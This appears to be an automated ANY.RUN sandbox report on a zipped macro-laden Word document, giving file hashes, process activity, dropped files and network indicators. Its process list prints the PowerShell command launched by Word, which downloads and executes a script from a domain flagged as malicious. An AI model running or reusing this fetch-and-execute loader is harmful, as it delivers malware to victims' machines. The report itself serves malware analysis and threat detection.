analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan3181874.zip

Full analysis: https://app.any.run/tasks/fb75ee82-092e-4855-afe6-21cec6ee708c
Verdict: Malicious activity
Analysis date: October 14, 2019, 07:25:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-4
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

6894CB6E76D0557265ACD09D525BDBD9

SHA1:

EB0B36D542307EAEEE26DC7E74EBACCDDE8B144E

SHA256:

13EF390EA07FC39446764BE6ACEA0D7553D293087955DD522B78D96631C68258

SSDEEP:

3072:OOb7kTCMYsocWycwdtQNclQfIkIqWDEcAbmcMG6pMFesZZz:OO8vYsohhwoNcl4bIqWDEcAKc+MFZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1732)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1732)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 1296)
    • Creates files in the user directory

      • powershell.exe (PID: 1560)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1732)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1732)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 06:12:00
ZipCRC: 0x90cf554e
ZipCompressedSize: 150586
ZipUncompressedSize: 8388609
ZipFileName: Nuovo_documento_68.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1296"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Scan3181874.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
1732"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa1296.43448\Nuovo_documento_68.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1560"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 293
Read events
1 549
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1296WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa1296.43448\Nuovo_documento_68.doc
MD5:
SHA256:
1732WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC389.tmp.cvr
MD5:
SHA256:
1560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DVEJ2Z326CT288S3OADZ.temp
MD5:
SHA256:
1560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39ccd0.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1732WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CAE0422EC2359F41A3458AE773AE143E
SHA256:B3C52AB036CB8CF91508C40E51D3513B006386AB67B7D35A92B27ECAC5589345
1732WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIa1296.43448\~$ovo_documento_68.docpgc
MD5:6829DB8801F9B492D6FE1BA774305487
SHA256:3F0EC0992F6E696F52C5B9C336475A76A142197D7DBE93260926601649DCA2E2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1560
powershell.exe
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
jes.dhinsuranceservices.com
  • 185.189.151.22
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info